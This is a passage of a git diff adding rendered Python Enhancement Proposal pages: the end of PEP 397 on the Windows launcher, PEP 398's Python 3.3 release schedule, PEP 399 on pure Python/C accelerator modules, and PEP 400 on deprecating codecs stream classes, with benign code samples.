On 64bit Windows with both 32bit and 64bit implementations of the +same (major.minor) Python version installed, the 64bit version will +always be preferred. This will be true for both 32bit and 64bit +implementations of the launcher - a 32bit launcher will prefer to +execute a 64bit Python installation of the specified version if +available. This is so the behavior of the launcher can be predicted +knowing only what versions are installed on the PC and without +regard to the order in which they were installed (ie, without knowing +whether a 32 or 64bit version of Python and corresponding launcher was +installed last). As noted above, an optional “-32” suffix can be used +on a version specifier to change this behaviour.

+

If no version qualifiers are found in a command, the environment variable +PY_PYTHON can be set to specify the default version qualifier - the default +value is “2”. Note this value could specify just a major version (e.g. “2”) or +a major.minor qualifier (e.g. “2.6”), or even major.minor-32.

+

If no minor version qualifiers are found, the environment variable +PY_PYTHON{major} (where {major} is the current major version qualifier +as determined above) can be set to specify the full version. If no such option +is found, the launcher will enumerate the installed Python versions and use +the latest minor release found for the major version, which is likely, +although not guaranteed, to be the most recently installed version in that +family.

+

In addition to environment variables, the same settings can be configured +in the .INI file used by the launcher. The section in the INI file is +called [defaults] and the key name will be the same as the +environment variables without the leading PY_ prefix (and note that +the key names in the INI file are case insensitive.) The contents of +an environment variable will override things specified in the INI file.

+
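
As an illustration of these rules, a hypothetical py.ini making Python 3 the default while pinning the 2.x series to the 32-bit 2.6 implementation might read:

[defaults]
python=3
python2=2.6-32

With this configuration, a shebang line of ‘#! /usr/bin/env python’ would locate the latest Python 3.x, ‘#! /usr/bin/python2’ would locate the 32-bit Python 2.6, and setting the environment variable PY_PYTHON2 would override the INI value.
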
+
+

Command-line handling

+

Only the first command-line argument will be checked for a shebang line +and only if that argument does not start with a ‘-‘.

+

If the only command-line argument is “-h” or “--help”, the launcher will +print a small banner and command-line usage, then pass the argument to +the default Python. This will cause help for the launcher to be printed, +followed by help for Python itself. The output from the launcher will +clearly indicate the extended help information is coming from the +launcher and not Python.

+

As a concession to interactively launching Python, the launcher will +support the first command-line argument optionally being a dash (“-“) +followed by a version qualifier, as described above, to nominate a +specific version be used. For example, while “py.exe” may locate and +launch the latest Python 2.x implementation installed, a command-line such +as “py.exe -3” could specify the latest Python 3.x implementation be +launched, while “py.exe -2.6-32” could specify a 32bit implementation of +Python 2.6 be located and launched. If a Python 2.x implementation is +desired to be launched with the -3 flag, the command-line would need to be +similar to “py.exe -2 -3” (or the specific version of Python could +obviously be launched manually without use of this launcher.) Note that +this feature can not be used with shebang processing as the file scanned +for a shebang line and this argument must both be the first argument and +therefore are mutually exclusive.

+

All other arguments will be passed untouched to the child Python process.

+
+
+

Process Launching

+

The launcher offers some conveniences for Python developers working +interactively - for example, starting the launcher with no command-line +arguments will launch the default Python with no command-line arguments. +Further, command-line arguments will be supported to allow a specific +Python version to be launched interactively - however, these conveniences +must not detract from the primary purpose of launching scripts and must +be easy to avoid if desired.

+

The launcher creates a subprocess to start the actual +interpreter. See Discussion below for the rationale.

+
+
+
+

Discussion

+

It may be surprising that the launcher is installed into the +Windows directory, and not the System32 directory. The reason is +that the System32 directory is not on the Path of a 32-bit process +running on a 64-bit system. However, the Windows directory is +always on the path.

+

The launcher that is installed into the Windows directory is a 32-bit +executable so that the 32-bit CPython installer can provide the same +binary for both 32-bit and 64-bit Windows installations.

+

Ideally, the launcher process would execute Python directly inside +the same process, primarily so the parent of the launcher process could +terminate the launcher and have the Python interpreter terminate. If the +launcher executes Python as a sub-process and the parent of the launcher +terminates the launcher, the Python process will be unaffected.

+

However, there are a number of practical problems associated with this approach. Windows does not support the execv* family of Unix functions, so this could only be done by the launcher dynamically loading the Python DLL, and this would have a number of side effects. The most serious side effect is that the value of sys.executable would refer to the launcher instead of the Python implementation. Many Python scripts use the value of sys.executable to launch child processes, and these scripts may fail to work as expected if the launcher is used. Consider a “parent” script with a shebang line of ‘#! /usr/bin/python3’ which attempts to launch a child script (with no shebang) via sys.executable - currently the child is launched using the exact same version running the parent script. If sys.executable referred to the launcher, the child would likely be executed using a Python 2.x version and would therefore be likely to fail with a SyntaxError.
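
The child-launching pattern referred to here is simply (the child script name is invented for illustration):

import subprocess
import sys

# Re-launch whatever interpreter is running this script for the child.
subprocess.check_call([sys.executable, 'child.py'])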

+

Another hurdle is the support for alternative Python implementations +using the “customized commands” feature described above, where loading +the command dynamically into a running executable is not possible.

+

The final hurdle is the rules above regarding 64-bit and 32-bit programs: a 32-bit launcher would be unable to load the 64-bit version of Python, and vice-versa.

+

Given these considerations, the launcher will execute its command in a child process, remaining alive while the child process is executing, then terminate with the same exit code as returned by the child. To address concerns about the termination of the launcher not killing the child, the Win32 Job API will be used to ensure that the child process is automatically killed when the parent is terminated (although children of that child process will continue, as is the case now.) As this Windows API is available in Windows XP and later, this launcher will not work on Windows 2000 or earlier.
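
The launcher itself is written in C, but as a rough illustration of the kill-on-close Job object technique described here, a ctypes sketch follows (Windows-only; the child command line is a stand-in, and Popen’s private _handle attribute is a CPython-specific shortcut):

import ctypes
import subprocess
from ctypes import wintypes

kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)
kernel32.CreateJobObjectW.restype = wintypes.HANDLE

class IO_COUNTERS(ctypes.Structure):
    _fields_ = [(name, ctypes.c_ulonglong) for name in (
        'ReadOperationCount', 'WriteOperationCount', 'OtherOperationCount',
        'ReadTransferCount', 'WriteTransferCount', 'OtherTransferCount')]

class JOBOBJECT_BASIC_LIMIT_INFORMATION(ctypes.Structure):
    _fields_ = [('PerProcessUserTimeLimit', wintypes.LARGE_INTEGER),
                ('PerJobUserTimeLimit', wintypes.LARGE_INTEGER),
                ('LimitFlags', wintypes.DWORD),
                ('MinimumWorkingSetSize', ctypes.c_size_t),
                ('MaximumWorkingSetSize', ctypes.c_size_t),
                ('ActiveProcessLimit', wintypes.DWORD),
                ('Affinity', ctypes.c_size_t),
                ('PriorityClass', wintypes.DWORD),
                ('SchedulingClass', wintypes.DWORD)]

class JOBOBJECT_EXTENDED_LIMIT_INFORMATION(ctypes.Structure):
    _fields_ = [('BasicLimitInformation', JOBOBJECT_BASIC_LIMIT_INFORMATION),
                ('IoInfo', IO_COUNTERS),
                ('ProcessMemoryLimit', ctypes.c_size_t),
                ('JobMemoryLimit', ctypes.c_size_t),
                ('PeakProcessMemoryUsed', ctypes.c_size_t),
                ('PeakJobMemoryUsed', ctypes.c_size_t)]

JobObjectExtendedLimitInformation = 9
JOB_OBJECT_LIMIT_KILL_ON_JOB_CLOSE = 0x2000

# Create a job whose handle, when closed (e.g. because this process dies),
# kills every process assigned to the job.
job = kernel32.CreateJobObjectW(None, None)
info = JOBOBJECT_EXTENDED_LIMIT_INFORMATION()
info.BasicLimitInformation.LimitFlags = JOB_OBJECT_LIMIT_KILL_ON_JOB_CLOSE
kernel32.SetInformationJobObject(job, JobObjectExtendedLimitInformation,
                                 ctypes.byref(info), ctypes.sizeof(info))

child = subprocess.Popen(['python', '-c', 'input()'])       # stand-in child
kernel32.AssignProcessToJobObject(job, int(child._handle))  # CPython-internal
raise SystemExit(child.wait())  # exit with the child's exit code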

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0397.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0398/index.html b/pep-0398/index.html new file mode 100644 index 00000000000..1725859044d --- /dev/null +++ b/pep-0398/index.html @@ -0,0 +1,317 @@ + + + + + + + + PEP 398 – Python 3.3 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 398 – Python 3.3 Release Schedule

+
+
Author:
+
Georg Brandl <georg at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
23-Mar-2011
+
Python-Version:
+
3.3
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 3.3. The schedule primarily concerns itself with PEP-sized +items.

+
+
+

Release Manager and Crew

+
    +
  • 3.3 Release Managers: Georg Brandl, Ned Deily (3.3.7+)
  • +
  • Windows installers: Martin v. Löwis
  • +
  • Mac installers: Ronald Oussoren/Ned Deily
  • +
  • Documentation: Georg Brandl
  • +
+
+
+

3.3 Lifespan

+

3.3 will receive bugfix updates approximately every 4-6 months for +approximately 18 months. After the release of 3.4.0 final, a final +3.3 bugfix update will be released. After that, security updates +(source only) will be released until 5 years after the release of 3.3 +final, which will be September 2017.

+

As of 2017-09-29, Python 3.3.x reached end-of-life status.

+
+
+

Release Schedule

+
+

3.3.0 schedule

+
    +
  • 3.3.0 alpha 1: March 5, 2012
  • +
  • 3.3.0 alpha 2: April 2, 2012
  • +
  • 3.3.0 alpha 3: May 1, 2012
  • +
  • 3.3.0 alpha 4: May 31, 2012
  • +
  • 3.3.0 beta 1: June 27, 2012
  • +
+

(No new features beyond this point.)

+
    +
  • 3.3.0 beta 2: August 12, 2012
  • +
  • 3.3.0 candidate 1: August 24, 2012
  • +
  • 3.3.0 candidate 2: September 9, 2012
  • +
  • 3.3.0 candidate 3: September 24, 2012
  • +
  • 3.3.0 final: September 29, 2012
  • +
+
+
+

3.3.1 schedule

+
    +
  • 3.3.1 candidate 1: March 23, 2013
  • +
  • 3.3.1 final: April 6, 2013
  • +
+
+
+

3.3.2 schedule

+
    +
  • 3.3.2 final: May 13, 2013
  • +
+
+
+

3.3.3 schedule

+
    +
  • 3.3.3 candidate 1: October 27, 2013
  • +
  • 3.3.3 candidate 2: November 9, 2013
  • +
  • 3.3.3 final: November 16, 2013
  • +
+
+
+

3.3.4 schedule

+
    +
  • 3.3.4 candidate 1: January 26, 2014
  • +
  • 3.3.4 final: February 9, 2014
  • +
+
+
+

3.3.5 schedule

+

Python 3.3.5 was the last regular maintenance release before 3.3 entered +security-fix only mode.

+
    +
  • 3.3.5 candidate 1: February 22, 2014
  • +
  • 3.3.5 candidate 2: March 1, 2014
  • +
  • 3.3.5 final: March 8, 2014
  • +
+
+
+

3.3.6 schedule

+

Security fixes only

+
    +
  • 3.3.6 candidate 1 (source-only release): October 4, 2014
  • +
  • 3.3.6 final (source-only release): October 11, 2014
  • +
+
+
+

3.3.7 schedule

+

Security fixes only

+
    +
  • 3.3.7 candidate 1 (source-only release): September 6, 2017
  • +
  • 3.3.7 final (source-only release): September 19, 2017
  • +
+
+
+

3.3.x end-of-life

+
    +
  • September 29, 2017
  • +
+
+
+
+

Features for 3.3

+

Implemented / Final PEPs:

+
    +
  • PEP 362: Function Signature Object
  • +
  • PEP 380: Syntax for Delegating to a Subgenerator
  • +
  • PEP 393: Flexible String Representation
  • +
  • PEP 397: Python launcher for Windows
  • +
  • PEP 399: Pure Python/C Accelerator Module Compatibility Requirements
  • +
  • PEP 405: Python Virtual Environments
  • +
  • PEP 409: Suppressing exception context
  • +
  • PEP 412: Key-Sharing Dictionary
  • +
  • PEP 414: Explicit Unicode Literal for Python 3.3
  • +
  • PEP 415: Implement context suppression with exception attributes
  • +
  • PEP 417: Including mock in the Standard Library
  • +
  • PEP 418: Add monotonic time, performance counter, and process time functions
  • +
  • PEP 420: Implicit Namespace Packages
  • +
  • PEP 421: Adding sys.implementation
  • +
  • PEP 3118: Revising the buffer protocol (protocol semantics finalised)
  • +
  • PEP 3144: IP Address manipulation library
  • +
  • PEP 3151: Reworking the OS and IO exception hierarchy
  • +
  • PEP 3155: Qualified name for classes and functions
  • +
+

Other final large-scale changes:

+
    +
  • Addition of the “faulthandler” module
  • +
  • Addition of the “lzma” module, and lzma/xz support in tarfile
  • +
  • Implementing __import__ using importlib
  • +
  • Addition of the C decimal implementation
  • +
  • Switch of Windows build toolchain to VS 2010
  • +
+

Candidate PEPs:

+
    +
  • None
  • +
+

Other planned large-scale changes:

+
    +
  • None
  • +
+

Deferred to post-3.3:

+
    +
  • PEP 395: Qualified Names for Modules
  • +
  • PEP 3143: Standard daemon process library
  • +
  • PEP 3154: Pickle protocol version 4
  • +
  • Breaking out standard library and docs in separate repos
  • +
  • Addition of the “packaging” module, deprecating “distutils”
  • +
  • Addition of the “regex” module
  • +
  • Email version 6
  • +
  • A standard event-loop interface (PEP by Jim Fulton pending)
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0398.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0399/index.html b/pep-0399/index.html new file mode 100644 index 00000000000..1110f6df208 --- /dev/null +++ b/pep-0399/index.html @@ -0,0 +1,277 @@ + + + + + + + + PEP 399 – Pure Python/C Accelerator Module Compatibility Requirements | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 399 – Pure Python/C Accelerator Module Compatibility Requirements

+
+
Author:
+
Brett Cannon <brett at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
04-Apr-2011
+
Python-Version:
+
3.3
+
Post-History:
+
04-Apr-2011, 12-Apr-2011, 17-Jul-2011, 15-Aug-2011, 01-Jan-2013
+
+
+
+
Table of Contents +
+
+

Abstract

+

The Python standard library under CPython contains various instances of modules implemented in both pure Python and C (either entirely or partially). This PEP requires that in these instances the C code must pass the test suite used for the pure Python code, so as to act as much like a drop-in replacement as is reasonably possible (C- and VM-specific tests are exempt). It also requires that new C-based modules lacking a pure Python equivalent implementation get special permission to be added to the standard library.

+
+
+

Rationale

+

Python has grown beyond the CPython virtual machine (VM). IronPython, +Jython, and PyPy are all currently viable alternatives to the +CPython VM. The VM ecosystem that has sprung up around the Python +programming language has led to Python being used in many different +areas where CPython cannot be used, e.g., Jython allowing Python to be +used in Java applications.

+

A problem all of the VMs other than CPython face is handling modules +from the standard library that are implemented (to some extent) in C. +Since other VMs do not typically support the entire C API of CPython +they are unable to use the code used to create the module. Oftentimes +this leads these other VMs to either re-implement the modules in pure +Python or in the programming language used to implement the VM itself +(e.g., in C# for IronPython). This duplication of effort between +CPython, PyPy, Jython, and IronPython is extremely unfortunate as +implementing a module at least in pure Python would help mitigate +this duplicate effort.

+

The purpose of this PEP is to minimize this duplicate effort by +mandating that all new modules added to Python’s standard library +must have a pure Python implementation unless special dispensation +is given. This makes sure that a module in the stdlib is available to +all VMs and not just to CPython (pre-existing modules that do not meet +this requirement are exempt, although there is nothing preventing +someone from adding in a pure Python implementation retroactively).

+

Re-implementing parts (or all) of a module in C (in the case +of CPython) is still allowed for performance reasons, but any such +accelerated code must pass the same test suite (sans VM- or C-specific +tests) to verify semantics and prevent divergence. To accomplish this, +the test suite for the module must have comprehensive coverage of the +pure Python implementation before the acceleration code may be added.

+
+
+

Details

+

Starting in Python 3.3, any modules added to the standard library must +have a pure Python implementation. This rule can only be ignored if +the Python development team grants a special exemption for the module. +Typically the exemption will be granted only when a module wraps a +specific C-based library (e.g., sqlite3). In granting an exemption it +will be recognized that the module will be considered exclusive to +CPython and not part of Python’s standard library that other VMs are +expected to support. Usage of ctypes to provide an +API for a C library will continue to be frowned upon as ctypes +lacks compiler guarantees that C code typically relies upon to prevent +certain errors from occurring (e.g., API changes).

+

Even though a pure Python implementation is mandated by this PEP, it +does not preclude the use of a companion acceleration module. If an +acceleration module is provided it is to be named the same as the +module it is accelerating with an underscore attached as a prefix, +e.g., _warnings for warnings. The common pattern to access +the accelerated code from the pure Python implementation is to import +it with an import *, e.g., from _warnings import *. This is +typically done at the end of the module to allow it to overwrite +specific Python objects with their accelerated equivalents. This kind +of import can also be done before the end of the module when needed, +e.g., an accelerated base class is provided but is then subclassed by +Python code. This PEP does not mandate that pre-existing modules in +the stdlib that lack a pure Python equivalent gain such a module. But +if people do volunteer to provide and maintain a pure Python +equivalent (e.g., the PyPy team volunteering their pure Python +implementation of the csv module and maintaining it) then such +code will be accepted. In those instances the C version is considered +the reference implementation in terms of expected semantics.
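
A simplified sketch of the naming and import pattern just described, using the text’s warnings/_warnings example (the real stdlib module is more elaborate):

# warnings.py -- sketch of a pure Python implementation

def warn(message, category=UserWarning, stacklevel=1):
    ...  # pure Python implementation goes here

# At the very end of the module, swap in the accelerated versions when
# this VM provides them (wrapping the import in try/except keeps the
# module working on VMs without the accelerator).
try:
    from _warnings import *
except ImportError:
    pass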

+

Any new accelerated code must act as a drop-in replacement as close to the pure Python implementation as reasonable. Technical details of the VM providing the accelerated code are allowed to differ as necessary, e.g., a class being a type when implemented in C. To verify that the Python and equivalent C code operate as similarly as possible, both code bases must be tested using the same tests which apply to the pure Python code (tests specific to the C code or any VM do not fall under this requirement). The test suite is expected to be extensive in order to verify expected semantics.

+

Acting as a drop-in replacement also dictates that no public API be +provided in accelerated code that does not exist in the pure Python +code. Without this requirement people could accidentally come to rely +on a detail in the accelerated code which is not made available to +other VMs that use the pure Python implementation. To help verify +that the contract of semantic equivalence is being met, a module must +be tested both with and without its accelerated code as thoroughly as +possible.

+

As an example, to write tests which exercise both the pure Python and +C accelerated versions of a module, a basic idiom can be followed:

+
from test.support import import_fresh_module
+import unittest
+
+c_heapq = import_fresh_module('heapq', fresh=['_heapq'])
+py_heapq = import_fresh_module('heapq', blocked=['_heapq'])
+
+
+class ExampleTest:
+
+    def test_example(self):
+        self.assertTrue(hasattr(self.module, 'heapify'))
+
+
+class PyExampleTest(ExampleTest, unittest.TestCase):
+    module = py_heapq
+
+
+@unittest.skipUnless(c_heapq, 'requires the C _heapq module')
+class CExampleTest(ExampleTest, unittest.TestCase):
+    module = c_heapq
+
+
+if __name__ == '__main__':
+    unittest.main()
+
+
+

The test module defines a base class (ExampleTest) with test methods that access the heapq module through a self.module class attribute, and two subclasses that set this attribute to either the Python or the C version of the module. Note that only the two subclasses inherit from unittest.TestCase – this prevents the ExampleTest class from being detected as a TestCase subclass by unittest test discovery. A skipUnless decorator can be added to the class that tests the C code in order to have these tests skipped when the C module is not available.

+

If this test were to provide extensive coverage for +heapq.heappop() in the pure Python implementation then the +accelerated C code would be allowed to be added to CPython’s standard +library. If it did not, then the test suite would need to be updated +until proper coverage was provided before the accelerated C code +could be added.

+

To also help with compatibility, C code should use abstract APIs on +objects to prevent accidental dependence on specific types. For +instance, if a function accepts a sequence then the C code should +default to using PyObject_GetItem() instead of something like +PyList_GetItem(). C code is allowed to have a fast path if the +proper PyList_CheckExact() is used, but otherwise APIs should work +with any object that duck types to the proper interface instead of a +specific type.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0399.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0400/index.html b/pep-0400/index.html new file mode 100644 index 00000000000..287af913f86 --- /dev/null +++ b/pep-0400/index.html @@ -0,0 +1,465 @@ + + + + + + + + PEP 400 – Deprecate codecs.StreamReader and codecs.StreamWriter | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 400 – Deprecate codecs.StreamReader and codecs.StreamWriter

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
28-May-2011
+
Python-Version:
+
3.3
+
+
+
+
Table of Contents +
+
+

Abstract

+

io.TextIOWrapper and codecs.StreamReaderWriter offer the same API [1]. TextIOWrapper has more features and is faster than StreamReaderWriter. Duplicate code means that bugs have to be fixed twice and that we may have subtle differences between the two implementations.

+

The codecs module was introduced in Python 2.0 (see the PEP 100). +The io module was +introduced in Python 2.6 and 3.0 (see the PEP 3116), +and reimplemented in C in +Python 2.7 and 3.1.

+
+
+

PEP Deferral

+

Further exploration of the concepts covered in this PEP has been deferred +for lack of a current champion interested in promoting the goals of the PEP +and collecting and incorporating feedback, and with sufficient available +time to do so effectively.

+
+
+

Motivation

+

When the Python I/O model was updated for 3.0, the concept of a +“stream-with-known-encoding” was introduced in the form of +io.TextIOWrapper. As this class is critical to the performance of +text-based I/O in Python 3, this module has an optimised C version +which is used by CPython by default. Many corner cases in handling +buffering, stateful codecs and universal newlines have been dealt with +since the release of Python 3.0.

+

This new interface overlaps heavily with the legacy codecs.StreamReader, codecs.StreamWriter and codecs.StreamReaderWriter interfaces that were part of the original codec interface design in PEP 100. These interfaces are organised around the principle of an encoding with an associated stream (i.e. the reverse of the arrangement in the io module), so the original PEP 100 design required that codec writers provide appropriate StreamReader and StreamWriter implementations in addition to the core codec encode() and decode() methods. This places a heavy burden on codec authors providing these specialised implementations to correctly handle many of the corner cases (see Appendix A) that have now been dealt with by io.TextIOWrapper. While deeper integration between the codec and the stream allows for additional optimisations in theory, these optimisations have in practice either not been carried out, or else the associated code duplication means that the corner cases that have been fixed in io.TextIOWrapper are still not handled correctly in the various StreamReader and StreamWriter implementations.

+

Accordingly, this PEP proposes that:

+
    +
  • codecs.open() be updated to delegate to the builtin open() in Python +3.3;
  • +
  • the legacy codecs.Stream* interfaces, including the streamreader and +streamwriter attributes of codecs.CodecInfo be deprecated in Python +3.3.
  • +
+
+
+

Rationale

+
+

StreamReader and StreamWriter issues

+
    +
  • StreamReader is unable to translate newlines.
  • +
  • StreamWriter doesn’t support “line buffering” (flush if the input +text contains a newline).
  • +
  • StreamReader classes of the CJK encodings (e.g. GB18030) only support UNIX newlines (’\n’).
  • +
  • StreamReader and StreamWriter are stateful codecs but don’t expose +functions to control their state (getstate() or setstate()). Each +codec has to handle corner cases, see Appendix A.
  • +
  • StreamReader and StreamWriter are very similar to IncrementalReader +and IncrementalEncoder, some code is duplicated for stateful codecs +(e.g. UTF-16).
  • +
  • Each codec has to reimplement its own StreamReader and StreamWriter +class, even if it’s trivial (just call the encoder/decoder).
  • +
  • codecs.open(filename, “r”) creates an io.TextIOWrapper object.
  • +
  • No codec implements an optimized method in StreamReader or +StreamWriter based on the specificities of the codec.
  • +
+

Issues in the bug tracker:

+
    +
  • Issue #5445 (2009-03-08): +codecs.StreamWriter.writelines problem when passed generator
  • +
  • Issue #7262 (2009-11-04): codecs.open() + eol (windows)
  • +
  • Issue #8260 (2010-03-29): +When I use codecs.open(…) and f.readline() follow up by f.read() +return bad result
  • +
  • Issue #8630 (2010-05-05): +Keepends param in codec readline(s)
  • +
  • Issue #10344 (2010-11-06): +codecs.readline doesn’t care buffering
  • +
  • Issue #11461 (2011-03-10): +Reading UTF-16 with codecs.readline() breaks on surrogate pairs
  • +
  • Issue #12446 (2011-06-30): +StreamReader Readlines behavior odd
  • +
  • Issue #12508 (2011-07-06): +Codecs Anomaly
  • +
  • Issue #12512 (2011-07-07): +codecs: StreamWriter issues with stateful codecs after a seek or +with append mode
  • +
  • Issue #12513 (2011-07-07): +codec.StreamReaderWriter: issues with interlaced read-write
  • +
+
+
+

TextIOWrapper features

+
    +
  • TextIOWrapper supports any kind of newline, including translating newlines (to UNIX newlines), for both reading and writing.
  • +
  • TextIOWrapper reuses codecs incremental encoders and decoders (no +duplication of code).
  • +
  • The io module (TextIOWrapper) is faster than the codecs module +(StreamReader). It is implemented in C, whereas codecs is +implemented in Python.
  • +
  • TextIOWrapper has a readahead algorithm which speeds up small reads: reading character by character or line by line (io is 10x to 25x faster than codecs on these operations).
  • +
  • TextIOWrapper has a write buffer.
  • +
  • TextIOWrapper.tell() is optimized.
  • +
  • TextIOWrapper supports random access (read+write) using a single class, which makes it possible to optimize interlaced read-write (but no such optimization is implemented).
  • +
+
+
+

TextIOWrapper issues

+
    +
  • Issue #12215 (2011-05-30): +TextIOWrapper: issues with interlaced read-write
  • +
+
+
+

Possible improvements of StreamReader and StreamWriter

+

By adding codec state read/write functions to the StreamReader and +StreamWriter classes, it will become possible to fix issues with +stateful codecs in a base class instead of in each stateful +StreamReader and StreamWriter classes.

+

It would be possible to change StreamReader and StreamWriter to make +them use IncrementalDecoder and IncrementalEncoder.
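
A minimal sketch of that idea for the writer side (the class name is invented, and error handling and state reset are omitted): StreamWriter.write() calls self.encode() and writes the returned bytes, so delegating encode() to an IncrementalEncoder lets the encoder keep any codec state (such as whether the BOM has been written) between calls.

import codecs

class IncrementalStreamWriter(codecs.StreamWriter):
    """StreamWriter that delegates encoding to an IncrementalEncoder."""

    def __init__(self, stream, errors='strict', encoding='utf-16'):
        codecs.StreamWriter.__init__(self, stream, errors)
        self._encoder = codecs.getincrementalencoder(encoding)(errors)

    def encode(self, input, errors='strict'):
        # The incremental encoder carries codec state across calls.
        return self._encoder.encode(input), len(input)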

+

A codec can implement variants which are optimized for the specific encoding or intercept certain stream methods to add functionality or improve the encoding/decoding performance. TextIOWrapper cannot implement such optimizations, but TextIOWrapper uses incremental encoders and decoders and uses read and write buffers, so the overhead of incomplete inputs is low or zero.

+

A lot more could be done for other variable length encoding codecs, +e.g. UTF-8, since these often have problems near the end of a read due +to missing bytes. The UTF-32-BE/LE codecs could simply multiply the +character position by 4 to get the byte position.

+
+
+

Usage of StreamReader and StreamWriter

+

These classes are rarely used directly; they are mostly used indirectly via codecs.open(). They are not used in the Python 3 standard library (except in the codecs module itself).

+

Some projects implement their own codecs with StreamReader and StreamWriter classes, as the original codec API design requires, but never actually use those classes.

+
+
+
+

Backwards Compatibility

+
+

Keep the public API, codecs.open

+

codecs.open() can be replaced by the builtin open() function. open() has a similar API but also has more options. Both functions return file-like objects with the same API.
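
For example (the filename is invented for illustration):

import codecs

with codecs.open('example.txt', 'w', encoding='utf-8') as f:  # legacy spelling
    f.write('héllo\n')

with open('example.txt', encoding='utf-8') as f:              # builtin equivalent
    assert f.read() == 'héllo\n'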

+

codecs.open() was the only way to open a text file in Unicode mode until Python 2.6. Many Python 2 programs use this function. Removing codecs.open() would imply more work to port programs from Python 2 to Python 3, especially for projects using the same code base for the two Python versions (without using the 2to3 program).

+

codecs.open() is kept for backward compatibility with Python 2.

+
+
+

Deprecate StreamReader and StreamWriter

+

Instantiating StreamReader or StreamWriter must emit a DeprecationWarning in +Python 3.3. Defining a subclass doesn’t emit a DeprecationWarning.
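
One way this could be implemented (a sketch, not the PEP’s prescribed patch) is to warn from __init__. Defining a subclass never calls __init__, so the warning only fires on instantiation - exactly the asymmetry described above:

import codecs
import warnings

class StreamWriter(codecs.Codec):
    # Sketch of the proposed change to codecs.py: the warning fires when
    # the class (or a subclass) is instantiated, but merely defining a
    # subclass emits nothing.
    def __init__(self, stream, errors='strict'):
        warnings.warn('codecs.StreamWriter is deprecated; use open() instead',
                      DeprecationWarning, stacklevel=2)
        self.stream = stream
        self.errors = errors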

+

codecs.open() will be changed to reuse the builtin open() function +(TextIOWrapper) to read-write text files.

+
+
+
+

Alternative Approach

+

An alternative to the deprecation of the codecs.Stream* classes is to rename +codecs.open() to codecs.open_stream(), and to create a new codecs.open() +function reusing open() and so io.TextIOWrapper.

+
+
+

Appendix A: Issues with stateful codecs

+

It is difficult to use a stateful codec with a stream correctly. Some cases are supported by the codecs module, while io has no remaining known bugs related to stateful codecs. The main difference between the codecs and the io module is that, for the codecs module, bugs have to be fixed in the StreamReader and/or StreamWriter classes of each codec, whereas for io they can be fixed once, in io.TextIOWrapper. Here are some examples of issues with stateful codecs.

+
+

Stateful codecs

+

Python supports the following stateful codecs:

+
    +
  • cp932
  • +
  • cp949
  • +
  • cp950
  • +
  • euc_jis_2004
  • +
  • euc_jisx0213
  • +
  • euc_jp
  • +
  • euc_kr
  • +
  • gb18030
  • +
  • gbk
  • +
  • hz
  • +
  • iso2022_jp
  • +
  • iso2022_jp_1
  • +
  • iso2022_jp_2
  • +
  • iso2022_jp_2004
  • +
  • iso2022_jp_3
  • +
  • iso2022_jp_ext
  • +
  • iso2022_kr
  • +
  • shift_jis
  • +
  • shift_jis_2004
  • +
  • shift_jisx0213
  • +
  • utf_8_sig
  • +
  • utf_16
  • +
  • utf_32
  • +
+
+
+

Read and seek(0)

+
with open(filename, 'w', encoding='utf-16') as f:
+    f.write('abc')
+    f.write('def')
+    f.seek(0)
+    assert f.read() == 'abcdef'
+    f.seek(0)
+    assert f.read() == 'abcdef'
+
+
+

The io and codecs modules support this use case correctly.

+
+
+

seek(n)

+
with open(filename, 'w', encoding='utf-16') as f:
+    f.write('abc')
+    pos = f.tell()
+with open(filename, 'w', encoding='utf-16') as f:
+    f.seek(pos)
+    f.write('def')
+    f.seek(0)
+    f.write('###')
+with open(filename, 'r', encoding='utf-16') as f:
+    assert f.read() == '###def'
+
+
+

The io module supports this use case, whereas codecs fails because it writes a new BOM on the second write (issue #12512).

+
+
+

Append mode

+
with open(filename, 'w', encoding='utf-16') as f:
+    f.write('abc')
+with open(filename, 'a', encoding='utf-16') as f:
+    f.write('def')
+with open(filename, 'r', encoding='utf-16') as f:
+    assert f.read() == 'abcdef'
+
+
+

The io module supports this use case, whereas codecs fails because it writes a new BOM on the second write (issue #12512).

+
+
+ + +
+

Footnotes

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0400.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0401/index.html b/pep-0401/index.html new file mode 100644 index 00000000000..c20dd4b20bc --- /dev/null +++ b/pep-0401/index.html @@ -0,0 +1,223 @@ + + + + + + + + PEP 401 – BDFL Retirement | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 401 – BDFL Retirement

+
+
Author:
+
Barry Warsaw, Brett Cannon
+
Status:
+
April Fool!
+
Type:
+
Process
+
Created:
+
01-Apr-2009
+
Post-History:
+
01-Apr-2009
+
+
+
+
Table of Contents +
+
+

Abstract

+

